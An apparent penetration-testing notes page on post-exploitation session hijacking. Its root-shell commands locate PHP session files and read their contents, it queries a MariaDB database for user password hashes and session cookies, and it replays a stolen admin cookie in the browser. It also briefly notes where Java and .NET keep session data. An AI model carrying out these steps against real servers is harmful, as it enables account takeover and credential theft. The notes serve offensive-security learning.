SESSION HIJACKING
session identifiers and session data can be retrieved from either a web server's disk or memory after the attacker has compromised a web server. although more impactful actions can be taken, there is some value to this post-exploitation method as it can be used in future attacks.
WEB SERVER ACCESS
PHP
root@target:~$ locate php.ini
/etc/php/7.4/apache2/php.ini
/etc/php/7.4/cli/php.ini
...
root@target:~$ cat /etc/php/7.4/cli/php.ini | grep 'session.save_path'
;session.save_path = "N;/path"
;session.save_path = "N;MODE;/path"
;session.save_path = "/var/lib/php/sessions"
root@target:~$ cat /etc/php/7.4/apache2/php.ini | grep 'session.save_path'
;session.save_path = "N;/path"
;session.save_path = "N;MODE;/path"
;session.save_path = "/var/lib/php/sessions"
* note that a victim has to be authenticated for the attackers to view their session identifier
* the files an attacker will search for use the name convention sess_<sessionID>
- the same PHP session identifier when viewed on the browser may look like...
Name: PHPSESSID Value: s6kitq8d3071rmvbfitpim9mm Domain: 192.. Path: /
- the same PHP session identifier when viewed on the web server may look like...
sess_s6kitq8d3071rmvbfitpim9mm
root@target:~$ ls /var/lib/php/sessions
sess_s6kitq8d3071rmvbfitpim9mm
root@target:~$ cat //var/lib/php/sessions/sess_s6kitq8d3071rmvbfitpim9mm
username|s:5:"admin";#
root@oco:~$ BROWSER > {targetSite:port} > F12 > Storage > Cookie > {targetSite}
Name: PHPSESSID
Value: s6kitq8d3071rmvbfitpim9mm
JAVA
on java, the filename of the default session data file is SESSIONS.ser. more information here
.NET
.net session identifiers and session data are stored at the following locations. more in-depth details: Introduction To ASP.NET Sessions
The application worker process (aspnet_wp.exe) - This is the case in the InProc Session mode
StateServer (A Windows Service residing on IIS or a separate server) - This is the case in the OutProc Session mode
An SQL Server
DATABASE ACCESS
this method can also be done on an SQLi vulnerability
root@target:~$
MariaDB[(none)]> show databases;
+-----------------+
| Database |
+-----------------+
| project |
| ... |
+-----------------+
MariaDB[(none)]> use project;
...
MariaDB[project]> show tables;
+-----------------+
| Database |
+-----------------+
| sessions |
| users |
| ... |
+-----------------+
MariaDB [project]> select * from users;
id username email password
1 test [email protected] 098f6bcd4621d373cade4e832627b4f6
2 admin [email protected] 21232f297a57a5a743894a0e4a801fc3
* these hashes will take time to crack
MariaDB [project]> select * from all_sessions
id name session
1 John Johnsspecialh4x0rc00kie
2 Ben Benssup3rs3cretc00kie
3 Developer (admin) develop3rl33tsp00ks
root@oco:~$ BROWSER > {targetSite:port} > F12 > Storage > Cookie > {targetSite}
Name: PHPSESSID
Value: develop3rl33tsp00ks
Last updated